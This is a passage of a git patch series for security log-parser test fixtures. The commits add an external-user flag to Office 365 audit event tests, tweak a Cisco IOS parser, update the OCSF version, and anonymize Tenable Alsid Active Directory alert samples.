} }, diff --git a/Office 365/o365/tests/teams_with_foreign_tenant_users.json b/Office 365/o365/tests/teams_with_foreign_tenant_users.json index 5b1e6802d..83f3436b7 100644 --- a/Office 365/o365/tests/teams_with_foreign_tenant_users.json +++ b/Office 365/o365/tests/teams_with_foreign_tenant_users.json @@ -50,6 +50,7 @@ }, "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/teams_with_foreign_tenant_users_2.json b/Office 365/o365/tests/teams_with_foreign_tenant_users_2.json index fed58f479..ecbdcb18f 100644 --- a/Office 365/o365/tests/teams_with_foreign_tenant_users_2.json +++ b/Office 365/o365/tests/teams_with_foreign_tenant_users_2.json @@ -44,6 +44,7 @@ }, "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/teams_with_foreign_tenant_users_3.json b/Office 365/o365/tests/teams_with_foreign_tenant_users_3.json index 727b939ce..34e139dff 100644 --- a/Office 365/o365/tests/teams_with_foreign_tenant_users_3.json +++ b/Office 365/o365/tests/teams_with_foreign_tenant_users_3.json @@ -44,6 +44,7 @@ }, "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/teams_without_foreign_tenant_users.json b/Office 365/o365/tests/teams_without_foreign_tenant_users.json index e22534f43..82ca31d6c 100644 --- a/Office 365/o365/tests/teams_without_foreign_tenant_users.json +++ b/Office 365/o365/tests/teams_without_foreign_tenant_users.json @@ -50,6 +50,7 @@ }, "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/threat_intel.json b/Office 365/o365/tests/threat_intel.json index f2bd901be..3b4c44e60 100644 --- a/Office 365/o365/tests/threat_intel.json +++ b/Office 365/o365/tests/threat_intel.json @@ -33,6 +33,7 @@ "record_type": 47, "user_type": { "code": 4, + "is_external": false, "name": "System" } }, diff --git a/Office 365/o365/tests/update_group.json b/Office 365/o365/tests/update_group.json index 20ba82d4d..7bd2bc5a7 100644 --- a/Office 365/o365/tests/update_group.json +++ b/Office 365/o365/tests/update_group.json @@ -30,6 +30,7 @@ "result_status": "Success", "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/update_user.json b/Office 365/o365/tests/update_user.json index b8b43939e..268397a3f 100644 --- a/Office 365/o365/tests/update_user.json +++ b/Office 365/o365/tests/update_user.json @@ -30,6 +30,7 @@ "result_status": "Success", "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/update_user_empty_source_ip.json b/Office 365/o365/tests/update_user_empty_source_ip.json index cd658f9a4..22759d202 100644 --- a/Office 365/o365/tests/update_user_empty_source_ip.json +++ b/Office 365/o365/tests/update_user_empty_source_ip.json @@ -57,6 +57,7 @@ "result_status": "Success", "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/user_logged_in.json b/Office 365/o365/tests/user_logged_in.json index 1cb5385fb..f982e5996 100644 --- a/Office 365/o365/tests/user_logged_in.json +++ b/Office 365/o365/tests/user_logged_in.json @@ -44,6 +44,7 @@ "result_status": "Succeeded", "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/user_logged_in_2.json b/Office 365/o365/tests/user_logged_in_2.json index 93fab6554..563567dc8 100644 --- a/Office 365/o365/tests/user_logged_in_2.json +++ b/Office 365/o365/tests/user_logged_in_2.json @@ -57,6 +57,7 @@ "result_status": "Success", "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/user_login_failed.json b/Office 365/o365/tests/user_login_failed.json index 9156612dc..21fc55744 100644 --- a/Office 365/o365/tests/user_login_failed.json +++ b/Office 365/o365/tests/user_login_failed.json @@ -55,6 +55,7 @@ "result_status": "Success", "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, From da94733e90b0cff1f3acfbbdb727527b1c5059c3 Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Fri, 13 Dec 2024 11:19:37 +0100 Subject: [PATCH 146/150] fix(Cisco): remove raise_errors parameter from the root stage --- Cisco/cisco-ios/ingest/parser.yml | 1 - 1 file changed, 1 deletion(-) diff --git a/Cisco/cisco-ios/ingest/parser.yml b/Cisco/cisco-ios/ingest/parser.yml index 634407c14..84cce9666 100644 --- a/Cisco/cisco-ios/ingest/parser.yml +++ b/Cisco/cisco-ios/ingest/parser.yml @@ -4,7 +4,6 @@ pipeline: external: name: grok.match properties: - raise_errors: false pattern: "(?:%{HOSTNAME:hostname}: )?%{CISCO_HEADER}: %{DATA:description}" custom_patterns: CISCO_HEADER: "%{CISCO_DATESTAMP}: %{MSG_CODE}" From 77327e02e79611455ebccaf0e8b7d63c1e73391e Mon Sep 17 00:00:00 2001 From: lvoloshyn-sekoia Date: Fri, 13 Dec 2024 13:06:37 +0200 Subject: [PATCH 147/150] add test --- Office 365/o365/tests/external_user.json | 102 +++++++++++++++++++++++ 1 file changed, 102 insertions(+) create mode 100644 Office 365/o365/tests/external_user.json diff --git a/Office 365/o365/tests/external_user.json b/Office 365/o365/tests/external_user.json new file mode 100644 index 000000000..fd3e6c34f --- /dev/null +++ b/Office 365/o365/tests/external_user.json @@ -0,0 +1,102 @@ +{ + "input": { + "message": "{\"AppAccessContext\": {\"ClientAppName\": \"MeTA\", \"CorrelationId\": \"27de65c0-1c43-4d70-9a4d-45a66418dbd6\"}, \"CreationTime\": \"2024-11-29T12:31:12\", \"Id\": \"609745a8-8ec0-4305-8607-fa95f45cf370\", \"Operation\": \"FileDownloaded\", \"OrganizationId\": \"eda474c4-ddfd-4ecd-85ff-3103a09b118d\", \"RecordType\": 6, \"UserKey\": \"urn:spo:guest:hash#aGVsbG8gdGhlcmUK\", \"UserType\": 0, \"Version\": 1, \"Workload\": \"OneDrive\", \"ClientIP\": \"1.2.3.4\", \"UserId\": \"urn:spo:guest#john.doe@example.com\", \"AuthenticationType\": \"OAuth\", \"BrowserName\": \"\", \"BrowserVersion\": \"\", \"CorrelationId\": \"27de65c0-1c43-4d70-9a4d-45a66418dbd6\", \"DoNotDistributeEvent\": true, \"EventSource\": \"SharePoint\", \"GeoLocation\": \"EUR\", \"IsManagedDevice\": false, \"ItemType\": \"File\", \"ListId\": \"56391ee5-91aa-44f9-810e-a5dc47abbb02\", \"ListItemUniqueId\": \"1d91eda8-2918-42f0-8f2b-88dd9aaffcdf\", \"Platform\": \"Service\", \"Site\": \"582d798a-ba87-4a78-8792-87db9262b0a3\", \"UserAgent\": \"OneDriveMpc-Transform_Zip/1.0\", \"UserSessionId\": \"b332294a-fad5-45a0-8761-63922a2544bf\", \"WebId\": \"ead1e78b-1d0c-4251-920a-f4fb48fce5e2\", \"DeviceDisplayName\": \"5.6.7.8\", \"EventSignature\": \"SOME_SIGNATURE\", \"FileSizeBytes\": 26860827, \"HighPriorityMediaProcessing\": false, \"ListBaseType\": 1, \"ListServerTemplate\": 700, \"SourceFileExtension\": \"zip\", \"ZipFileName\": \"1.zip\", \"SiteUrl\": \"https://example.com/\", \"SourceRelativeUrl\": \"Documents/IMT MBA\", \"SourceFileName\": \"1.zip\", \"ApplicationDisplayName\": \"MeTA\", \"ObjectId\": \"https://example.com/1.zip\"}" + }, + "expected": { + "message": "{\"AppAccessContext\": {\"ClientAppName\": \"MeTA\", \"CorrelationId\": \"27de65c0-1c43-4d70-9a4d-45a66418dbd6\"}, \"CreationTime\": \"2024-11-29T12:31:12\", \"Id\": \"609745a8-8ec0-4305-8607-fa95f45cf370\", \"Operation\": \"FileDownloaded\", \"OrganizationId\": \"eda474c4-ddfd-4ecd-85ff-3103a09b118d\", \"RecordType\": 6, \"UserKey\": \"urn:spo:guest:hash#aGVsbG8gdGhlcmUK\", \"UserType\": 0, \"Version\": 1, \"Workload\": \"OneDrive\", \"ClientIP\": \"1.2.3.4\", \"UserId\": \"urn:spo:guest#john.doe@example.com\", \"AuthenticationType\": \"OAuth\", \"BrowserName\": \"\", \"BrowserVersion\": \"\", \"CorrelationId\": \"27de65c0-1c43-4d70-9a4d-45a66418dbd6\", \"DoNotDistributeEvent\": true, \"EventSource\": \"SharePoint\", \"GeoLocation\": \"EUR\", \"IsManagedDevice\": false, \"ItemType\": \"File\", \"ListId\": \"56391ee5-91aa-44f9-810e-a5dc47abbb02\", \"ListItemUniqueId\": \"1d91eda8-2918-42f0-8f2b-88dd9aaffcdf\", \"Platform\": \"Service\", \"Site\": \"582d798a-ba87-4a78-8792-87db9262b0a3\", \"UserAgent\": \"OneDriveMpc-Transform_Zip/1.0\", \"UserSessionId\": \"b332294a-fad5-45a0-8761-63922a2544bf\", \"WebId\": \"ead1e78b-1d0c-4251-920a-f4fb48fce5e2\", \"DeviceDisplayName\": \"5.6.7.8\", \"EventSignature\": \"SOME_SIGNATURE\", \"FileSizeBytes\": 26860827, \"HighPriorityMediaProcessing\": false, \"ListBaseType\": 1, \"ListServerTemplate\": 700, \"SourceFileExtension\": \"zip\", \"ZipFileName\": \"1.zip\", \"SiteUrl\": \"https://example.com/\", \"SourceRelativeUrl\": \"Documents/IMT MBA\", \"SourceFileName\": \"1.zip\", \"ApplicationDisplayName\": \"MeTA\", \"ObjectId\": \"https://example.com/1.zip\"}", + "event": { + "action": "FileDownloaded", + "category": [ + "file" + ], + "code": "6", + "outcome": "success", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-29T12:31:12Z", + "action": { + "id": 6, + "name": "FileDownloaded", + "outcome": "success", + "properties": [ + { + "SiteUrl": "https://example.com/", + "SourceFileName": "1.zip", + "SourceRelativeUrl": "Documents/IMT MBA", + "UserAgent": "OneDriveMpc-Transform_Zip/1.0" + } + ], + "target": "user" + }, + "file": { + "directory": "Documents/IMT MBA", + "extension": "zip", + "name": "1.zip", + "size": 26860827 + }, + "office365": { + "audit": { + "object_id": "https://example.com/1.zip" + }, + "context": { + "client": { + "name": "MeTA" + }, + "correlation": { + "id": "27de65c0-1c43-4d70-9a4d-45a66418dbd6" + } + }, + "record_type": 6, + "user_type": { + "code": 0, + "is_external": true, + "name": "Regular" + } + }, + "organization": { + "id": "eda474c4-ddfd-4ecd-85ff-3103a09b118d" + }, + "related": { + "ip": [ + "1.2.3.4" + ], + "user": [ + "john.doe@example.com" + ] + }, + "service": { + "name": "OneDrive" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + }, + "url": { + "domain": "example.com", + "full": "https://example.com/1.zip", + "original": "https://example.com/1.zip", + "path": "/1.zip", + "port": 443, + "registered_domain": "example.com", + "scheme": "https", + "top_level_domain": "com" + }, + "user": { + "email": "john.doe@example.com", + "id": "urn:spo:guest:hash#aGVsbG8gdGhlcmUK", + "name": "john.doe@example.com" + }, + "user_agent": { + "device": { + "name": "Other" + }, + "name": "Other", + "original": "OneDriveMpc-Transform_Zip/1.0", + "os": { + "name": "Other" + } + } + } +} \ No newline at end of file From 43aec5548cbf98b36997762a457d179b9c421406 Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Fri, 13 Dec 2024 16:37:19 +0100 Subject: [PATCH 148/150] chore(OCSF): update the supported version of the specification --- OCSF/ocsf/_meta/manifest.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/OCSF/ocsf/_meta/manifest.yml b/OCSF/ocsf/_meta/manifest.yml index b8f0e2b86..5e5fa828c 100644 --- a/OCSF/ocsf/_meta/manifest.yml +++ b/OCSF/ocsf/_meta/manifest.yml @@ -7,7 +7,7 @@ slug: ocsf description: >- The Open Cybersecurity Schema Framework is an open-source project, delivering an extensible framework for developing schemas, along with a vendor-agnostic core security schema. - Supported version: **1.1** + Supported version: **1.3** data_sources: File monitoring: OCSF allows collecting system activities From f52f5d40805d5a98d82ccaef162872c109e1fea9 Mon Sep 17 00:00:00 2001 From: TOUFIKI Zakarya Date: Mon, 16 Dec 2024 12:51:01 +0100 Subject: [PATCH 149/150] Fix client data --- Tenable/alsid/tests/alert_gpo_exec.json | 14 +++++++------- Tenable/alsid/tests/alert_obsolete_system.json | 14 +++++++------- Tenable/alsid/tests/alert_pattern2.json | 12 ++++++------ Tenable/alsid/tests/event_1.json | 16 ++++++++-------- Tenable/alsid/tests/event_2.json | 12 ++++++------ Tenable/alsid/tests/event_3.json | 14 +++++++------- Tenable/alsid/tests/event_4.json | 18 +++++++++--------- Tenable/alsid/tests/ioe_security_alert1.json | 12 ++++++------ Tenable/alsid/tests/ioe_security_alert3.json | 10 +++++----- Tenable/alsid/tests/ioe_security_alert4.json | 8 ++++---- Tenable/alsid/tests/trailflow_alert1.json | 10 +++++----- Tenable/alsid/tests/trailflow_alert2.json | 10 +++++----- Tenable/alsid/tests/trailflow_alert3.json | 12 ++++++------ Tenable/alsid/tests/trailflow_alert4.json | 10 +++++----- 14 files changed, 86 insertions(+), 86 deletions(-) diff --git a/Tenable/alsid/tests/alert_gpo_exec.json b/Tenable/alsid/tests/alert_gpo_exec.json index fd44a4363..f55ff40bf 100644 --- a/Tenable/alsid/tests/alert_gpo_exec.json +++ b/Tenable/alsid/tests/alert_gpo_exec.json @@ -1,9 +1,9 @@ { "input": { - "message": "\"0\" \"1\" \"ad.domain\" \"urdom.ad.domain\" \"C-GPO-EXEC-SANITY\" \"high\" \"CN={3D4A6260-9D6C-4062-B56B-DC6D419333CE},CN=Policies,CN=System,DC=urdom,DC=ad,DC=domain\" \"2008125\" \"2\" \n\"R-GPO-EXEC-SANITY-UNKNOWN-CSE\" \"79016668\" \"CseGuid\"=\"{8472c2c4-6b70-4301-a20d-a6cea5f82b7e}\" \"AttributeName\"=\"GpcMachineExtensionName\" \"GpoName\"=\"#URDOM-APP-RSAT-TEST\"" + "message": "\"0\" \"1\" \"ad.domain\" \"test.ad.domain\" \"C-GPO-EXEC-SANITY\" \"high\" \"CN={3D4A6260-9000-4000-B000-DC6D41900000},CN=Policies,CN=System,DC=test,DC=ad,DC=domain\" \"2008000\" \"2\" \n\"R-GPO-EXEC-SANITY-UNKNOWN-CSE\" \"790160000\" \"CseGuid\"=\"{8472c2c4-6b70-4301-a20d-a6cea5f82b7e}\" \"AttributeName\"=\"GpcMachineExtensionName\" \"GpoName\"=\"#TEST-APP-RSAT-TEST\"" }, "expected": { - "message": "\"0\" \"1\" \"ad.domain\" \"urdom.ad.domain\" \"C-GPO-EXEC-SANITY\" \"high\" \"CN={3D4A6260-9D6C-4062-B56B-DC6D419333CE},CN=Policies,CN=System,DC=urdom,DC=ad,DC=domain\" \"2008125\" \"2\" \n\"R-GPO-EXEC-SANITY-UNKNOWN-CSE\" \"79016668\" \"CseGuid\"=\"{8472c2c4-6b70-4301-a20d-a6cea5f82b7e}\" \"AttributeName\"=\"GpcMachineExtensionName\" \"GpoName\"=\"#URDOM-APP-RSAT-TEST\"", + "message": "\"0\" \"1\" \"ad.domain\" \"test.ad.domain\" \"C-GPO-EXEC-SANITY\" \"high\" \"CN={3D4A6260-9000-4000-B000-DC6D41900000},CN=Policies,CN=System,DC=test,DC=ad,DC=domain\" \"2008000\" \"2\" \n\"R-GPO-EXEC-SANITY-UNKNOWN-CSE\" \"790160000\" \"CseGuid\"=\"{8472c2c4-6b70-4301-a20d-a6cea5f82b7e}\" \"AttributeName\"=\"GpcMachineExtensionName\" \"GpoName\"=\"#TEST-APP-RSAT-TEST\"", "event": { "kind": "alert", "outcome": "success" @@ -13,16 +13,16 @@ "outcome": "success", "outcome_reason": "R-GPO-EXEC-SANITY-UNKNOWN-CSE", "properties": { - "ADdevianceID": 2008125, - "ADdomainName": "urdom.ad.domain", + "ADdevianceID": 2008000, + "ADdomainName": "test.ad.domain", "ADforestName": "ad.domain", - "ADobject": "CN={3D4A6260-9D6C-4062-B56B-DC6D419333CE},CN=Policies,CN=System,DC=urdom,DC=ad,DC=domain", + "ADobject": "CN={3D4A6260-9000-4000-B000-DC6D41900000},CN=Policies,CN=System,DC=test,DC=ad,DC=domain", "AttributeName": "GpcMachineExtensionName", "CseGuid": "{8472c2c4-6b70-4301-a20d-a6cea5f82b7e}", - "GpoName": "#URDOM-APP-RSAT-TEST", + "GpoName": "#TEST-APP-RSAT-TEST", "alertID": 1, "alertSeverityLevel": "high", - "eventID": "79016668" + "eventID": "790160000" }, "type": "alert" }, diff --git a/Tenable/alsid/tests/alert_obsolete_system.json b/Tenable/alsid/tests/alert_obsolete_system.json index 32e1efc05..69c282597 100644 --- a/Tenable/alsid/tests/alert_obsolete_system.json +++ b/Tenable/alsid/tests/alert_obsolete_system.json @@ -1,9 +1,9 @@ { "input": { - "message": "\"0\" \"1\" \"ad.domain\" \"urdom.ad.domain\" \"C-OBSOLETE-SYSTEMS\" \"high\" \n \"CN=cnpsp16bd,OU=Sharepoint,OU=Production,OU=DataCenter,OU=Serveurs,OU=DataC \n ter,DC=urdom,DC=ad,DC=domain\" \"2007590\" \"2\" \"R-SLEEPING-OBSOLETE-SYSTEMS\" \n \"78964369\" \"ComputerCn\"=\"cnpsp16bd\" \"OperatingSystem\"=\"Windows Server 2012 R2 \n Standard\" \"OperatingSystemVersion\"=\"6.3 (9600)\"" + "message": "\"0\" \"1\" \"ad.domain\" \"test.ad.domain\" \"C-OBSOLETE-SYSTEMS\" \"high\" \n \"CN=testCN,OU=Sharepoint,OU=Production,OU=DataCenter,OU=Serveurs,OU=DataC \n ter,DC=testDC,DC=ad,DC=domain\" \"2007000\" \"2\" \"R-SLEEPING-OBSOLETE-SYSTEMS\" \n \"78964000\" \"ComputerCn\"=\"testComputerCN\" \"OperatingSystem\"=\"Windows Server 2012 R2 \n Standard\" \"OperatingSystemVersion\"=\"6.3 (9600)\"" }, "expected": { - "message": "\"0\" \"1\" \"ad.domain\" \"urdom.ad.domain\" \"C-OBSOLETE-SYSTEMS\" \"high\" \n \"CN=cnpsp16bd,OU=Sharepoint,OU=Production,OU=DataCenter,OU=Serveurs,OU=DataC \n ter,DC=urdom,DC=ad,DC=domain\" \"2007590\" \"2\" \"R-SLEEPING-OBSOLETE-SYSTEMS\" \n \"78964369\" \"ComputerCn\"=\"cnpsp16bd\" \"OperatingSystem\"=\"Windows Server 2012 R2 \n Standard\" \"OperatingSystemVersion\"=\"6.3 (9600)\"", + "message": "\"0\" \"1\" \"ad.domain\" \"test.ad.domain\" \"C-OBSOLETE-SYSTEMS\" \"high\" \n \"CN=testCN,OU=Sharepoint,OU=Production,OU=DataCenter,OU=Serveurs,OU=DataC \n ter,DC=testDC,DC=ad,DC=domain\" \"2007000\" \"2\" \"R-SLEEPING-OBSOLETE-SYSTEMS\" \n \"78964000\" \"ComputerCn\"=\"testComputerCN\" \"OperatingSystem\"=\"Windows Server 2012 R2 \n Standard\" \"OperatingSystemVersion\"=\"6.3 (9600)\"", "event": { "kind": "alert", "outcome": "success" @@ -13,16 +13,16 @@ "outcome": "success", "outcome_reason": "R-SLEEPING-OBSOLETE-SYSTEMS", "properties": { - "ADdevianceID": 2007590, - "ADdomainName": "urdom.ad.domain", + "ADdevianceID": 2007000, + "ADdomainName": "test.ad.domain", "ADforestName": "ad.domain", - "ADobject": "CN=cnpsp16bd,OU=Sharepoint,OU=Production,OU=DataCenter,OU=Serveurs,OU=DataC ter,DC=urdom,DC=ad,DC=domain", - "ComputerCn": "cnpsp16bd", + "ADobject": "CN=testCN,OU=Sharepoint,OU=Production,OU=DataCenter,OU=Serveurs,OU=DataC ter,DC=testDC,DC=ad,DC=domain", + "ComputerCn": "testComputerCN", "OperatingSystem": "Windows Server 2012 R2 Standard", "OperatingSystemVersion": "6.3 (9600)", "alertID": 1, "alertSeverityLevel": "high", - "eventID": "78964369" + "eventID": "78964000" }, "type": "alert" }, diff --git a/Tenable/alsid/tests/alert_pattern2.json b/Tenable/alsid/tests/alert_pattern2.json index 2364c0604..c514b9478 100644 --- a/Tenable/alsid/tests/alert_pattern2.json +++ b/Tenable/alsid/tests/alert_pattern2.json @@ -1,9 +1,9 @@ { "input": { - "message": "\"2\" \"21\" \"foo.ad.com\" \"AD\" \"Suspicious DC Password Change\" \"critical\" \"Unknown\" \"Unknown\" \"HOSTNAME-040\" \"10.17.92.40\" \"user\"=\"ANONYMOUS LOGON\" \"source_hostname\"=\"Unknown\" \"source_ip\"=\"Unknown\" \"dc_name\"=\"HOSTNAME-040\" \"dc_ip\"=\"10.17.92.40\" \"targeted_dc_account\"=\"USERNAME-002$\" \"tool\"=\"foo-script\" \"password_renewal_duration\"=\"30:04:30:05\"" + "message": "\"2\" \"21\" \"foo.ad.com\" \"AD\" \"Suspicious DC Password Change\" \"critical\" \"Unknown\" \"Unknown\" \"HOSTNAME-000\" \"1.2.3.4\" \"user\"=\"ANONYMOUS LOGON\" \"source_hostname\"=\"Unknown\" \"source_ip\"=\"Unknown\" \"dc_name\"=\"HOSTNAME-000\" \"dc_ip\"=\"1.2.3.4\" \"targeted_dc_account\"=\"USERNAME-002$\" \"tool\"=\"foo-script\" \"password_renewal_duration\"=\"30:04:30:05\"" }, "expected": { - "message": "\"2\" \"21\" \"foo.ad.com\" \"AD\" \"Suspicious DC Password Change\" \"critical\" \"Unknown\" \"Unknown\" \"HOSTNAME-040\" \"10.17.92.40\" \"user\"=\"ANONYMOUS LOGON\" \"source_hostname\"=\"Unknown\" \"source_ip\"=\"Unknown\" \"dc_name\"=\"HOSTNAME-040\" \"dc_ip\"=\"10.17.92.40\" \"targeted_dc_account\"=\"USERNAME-002$\" \"tool\"=\"foo-script\" \"password_renewal_duration\"=\"30:04:30:05\"", + "message": "\"2\" \"21\" \"foo.ad.com\" \"AD\" \"Suspicious DC Password Change\" \"critical\" \"Unknown\" \"Unknown\" \"HOSTNAME-000\" \"1.2.3.4\" \"user\"=\"ANONYMOUS LOGON\" \"source_hostname\"=\"Unknown\" \"source_ip\"=\"Unknown\" \"dc_name\"=\"HOSTNAME-000\" \"dc_ip\"=\"1.2.3.4\" \"targeted_dc_account\"=\"USERNAME-002$\" \"tool\"=\"foo-script\" \"password_renewal_duration\"=\"30:04:30:05\"", "event": { "kind": "alert" }, @@ -13,13 +13,13 @@ "ADforestName": "foo.ad.com", "ADobject": "Suspicious DC Password Change", "alertID": 21, - "dc_ip": "10.17.92.40", - "dc_name": "HOSTNAME-040", + "dc_ip": "1.2.3.4", + "dc_name": "HOSTNAME-000", "eventID": "critical", "eventType": "Unknown", "field1": "Unknown", - "field2": "HOSTNAME-040", - "field3": "10.17.92.40", + "field2": "HOSTNAME-000", + "field3": "1.2.3.4", "password_renewal_duration": "30:04:30:05", "source_hostname": "Unknown", "source_ip": "Unknown", diff --git a/Tenable/alsid/tests/event_1.json b/Tenable/alsid/tests/event_1.json index 1f9418431..e12e5d53e 100644 --- a/Tenable/alsid/tests/event_1.json +++ b/Tenable/alsid/tests/event_1.json @@ -1,9 +1,9 @@ { "input": { - "message": "\"0\" \"1\" \"Alsid Forest\" \"emea.corp\" \"C-ADMIN-RESTRICT-AUTH\" \"high\" \"OU=D528,OU=Desktops,OU=Computers,DC=emae,DC=corp\" \"1958016\" \"2\" \"R-PRIVUSER-CAN-LOGON\" \"49271575\" \"UserCn\"=\"John DOE (Admin T0)\" \"UserDomain\"=\"emea.corp\" \"PrivilegesPath\"=\"CN=Adminintrator,CN=Users,DC=emae,DC=corp\" \"ParentContainer\"=\"OU=D528,OU=Desktops,OU=Computers,DC=emae,DC=corp\"" + "message": "\"0\" \"1\" \"Alsid Forest\" \"test.corp\" \"C-ADMIN-RESTRICT-AUTH\" \"high\" \"OU=D000,OU=Desktops,OU=Computers,DC=test,DC=corp\" \"1958000\" \"2\" \"R-PRIVUSER-CAN-LOGON\" \"49271000\" \"UserCn\"=\"John DOE (Admin T0)\" \"UserDomain\"=\"test.corp\" \"PrivilegesPath\"=\"CN=Adminintrator,CN=Users,DC=emae,DC=corp\" \"ParentContainer\"=\"OU=D000,OU=Desktops,OU=Computers,DC=emae,DC=corp\"" }, "expected": { - "message": "\"0\" \"1\" \"Alsid Forest\" \"emea.corp\" \"C-ADMIN-RESTRICT-AUTH\" \"high\" \"OU=D528,OU=Desktops,OU=Computers,DC=emae,DC=corp\" \"1958016\" \"2\" \"R-PRIVUSER-CAN-LOGON\" \"49271575\" \"UserCn\"=\"John DOE (Admin T0)\" \"UserDomain\"=\"emea.corp\" \"PrivilegesPath\"=\"CN=Adminintrator,CN=Users,DC=emae,DC=corp\" \"ParentContainer\"=\"OU=D528,OU=Desktops,OU=Computers,DC=emae,DC=corp\"", + "message": "\"0\" \"1\" \"Alsid Forest\" \"test.corp\" \"C-ADMIN-RESTRICT-AUTH\" \"high\" \"OU=D000,OU=Desktops,OU=Computers,DC=test,DC=corp\" \"1958000\" \"2\" \"R-PRIVUSER-CAN-LOGON\" \"49271000\" \"UserCn\"=\"John DOE (Admin T0)\" \"UserDomain\"=\"test.corp\" \"PrivilegesPath\"=\"CN=Adminintrator,CN=Users,DC=emae,DC=corp\" \"ParentContainer\"=\"OU=D000,OU=Desktops,OU=Computers,DC=emae,DC=corp\"", "event": { "kind": "alert", "outcome": "success" @@ -13,15 +13,15 @@ "outcome": "success", "outcome_reason": "R-PRIVUSER-CAN-LOGON", "properties": { - "ADdevianceID": 1958016, - "ADdomainName": "emea.corp", + "ADdevianceID": 1958000, + "ADdomainName": "test.corp", "ADforestName": "Alsid Forest", - "ADobject": "OU=D528,OU=Desktops,OU=Computers,DC=emae,DC=corp", - "ParentContainer": "OU=D528,OU=Desktops,OU=Computers,DC=emae,DC=corp", + "ADobject": "OU=D000,OU=Desktops,OU=Computers,DC=test,DC=corp", + "ParentContainer": "OU=D000,OU=Desktops,OU=Computers,DC=emae,DC=corp", "PrivilegesPath": "CN=Adminintrator,CN=Users,DC=emae,DC=corp", "alertID": 1, "alertSeverityLevel": "high", - "eventID": "49271575" + "eventID": "49271000" }, "type": "alert" }, @@ -35,7 +35,7 @@ "type": "ldap" }, "user": { - "domain": "emea.corp", + "domain": "test.corp", "name": "John DOE" } } diff --git a/Tenable/alsid/tests/event_2.json b/Tenable/alsid/tests/event_2.json index 9a09badeb..99cb8e395 100644 --- a/Tenable/alsid/tests/event_2.json +++ b/Tenable/alsid/tests/event_2.json @@ -1,9 +1,9 @@ { "input": { - "message": "\"0\" \"1\" \"Alsid Forest\" \"emea.corp\" \"C-UNCONST-DELEG\" \"critical\" \"CN=Thrid Backup,OU=Technical,OU=Users,OU=Third,DC=emea,DC=corp\" \"1920595\" \"2\" \"R-DELEG-PRIVUSERS-NOT-PROTECTED\" \"50666797\" \"Cn\"=\"Thrid Backup\" \"PrivilegesPath\"=\"CN=Backup,CN=Builtin,DC=emea,DC=corp\"" + "message": "\"0\" \"1\" \"Alsid Forest\" \"test.corp\" \"C-UNCONST-DELEG\" \"critical\" \"CN=Thrid Backup,OU=Technical,OU=Users,OU=Third,DC=test,DC=corp\" \"1920000\" \"2\" \"R-DELEG-PRIVUSERS-NOT-PROTECTED\" \"50666797\" \"Cn\"=\"Thrid Backup\" \"PrivilegesPath\"=\"CN=Backup,CN=Builtin,DC=test,DC=corp\"" }, "expected": { - "message": "\"0\" \"1\" \"Alsid Forest\" \"emea.corp\" \"C-UNCONST-DELEG\" \"critical\" \"CN=Thrid Backup,OU=Technical,OU=Users,OU=Third,DC=emea,DC=corp\" \"1920595\" \"2\" \"R-DELEG-PRIVUSERS-NOT-PROTECTED\" \"50666797\" \"Cn\"=\"Thrid Backup\" \"PrivilegesPath\"=\"CN=Backup,CN=Builtin,DC=emea,DC=corp\"", + "message": "\"0\" \"1\" \"Alsid Forest\" \"test.corp\" \"C-UNCONST-DELEG\" \"critical\" \"CN=Thrid Backup,OU=Technical,OU=Users,OU=Third,DC=test,DC=corp\" \"1920000\" \"2\" \"R-DELEG-PRIVUSERS-NOT-PROTECTED\" \"50666797\" \"Cn\"=\"Thrid Backup\" \"PrivilegesPath\"=\"CN=Backup,CN=Builtin,DC=test,DC=corp\"", "event": { "kind": "alert", "outcome": "success" @@ -13,11 +13,11 @@ "outcome": "success", "outcome_reason": "R-DELEG-PRIVUSERS-NOT-PROTECTED", "properties": { - "ADdevianceID": 1920595, - "ADdomainName": "emea.corp", + "ADdevianceID": 1920000, + "ADdomainName": "test.corp", "ADforestName": "Alsid Forest", - "ADobject": "CN=Thrid Backup,OU=Technical,OU=Users,OU=Third,DC=emea,DC=corp", - "PrivilegesPath": "CN=Backup,CN=Builtin,DC=emea,DC=corp", + "ADobject": "CN=Thrid Backup,OU=Technical,OU=Users,OU=Third,DC=test,DC=corp", + "PrivilegesPath": "CN=Backup,CN=Builtin,DC=test,DC=corp", "alertID": 1, "alertSeverityLevel": "critical", "eventID": "50666797" diff --git a/Tenable/alsid/tests/event_3.json b/Tenable/alsid/tests/event_3.json index 2611ce026..040246618 100644 --- a/Tenable/alsid/tests/event_3.json +++ b/Tenable/alsid/tests/event_3.json @@ -1,9 +1,9 @@ { "input": { - "message": "\"0\" \"1\" \"Alsid Forest\" \"emea.corp\" \"C-NATIVE-ADM-GROUP-MEMBERS\" \"critical\" \"CN=Main Administrators,CN=Users,DC=emea,DC=corp\" \"1959337\" \"2\" \"R-NOT-IN-WHITELIST\" \"51204253\" \"AccountCn\"=\"John Doe (Admin Root)\" \"GroupCn\"=\"Main Administrators\" \"PrivilegesPath\"=\"CN=Main Administrators,CN=Users,DC=emea,DC=corp\"" + "message": "\"0\" \"1\" \"Alsid Forest\" \"test.corp\" \"C-NATIVE-ADM-GROUP-MEMBERS\" \"critical\" \"CN=Main Administrators,CN=Users,DC=test,DC=corp\" \"1959000\" \"2\" \"R-NOT-IN-WHITELIST\" \"51200000\" \"AccountCn\"=\"John Doe (Admin Root)\" \"GroupCn\"=\"Main Administrators\" \"PrivilegesPath\"=\"CN=Main Administrators,CN=Users,DC=test,DC=corp\"" }, "expected": { - "message": 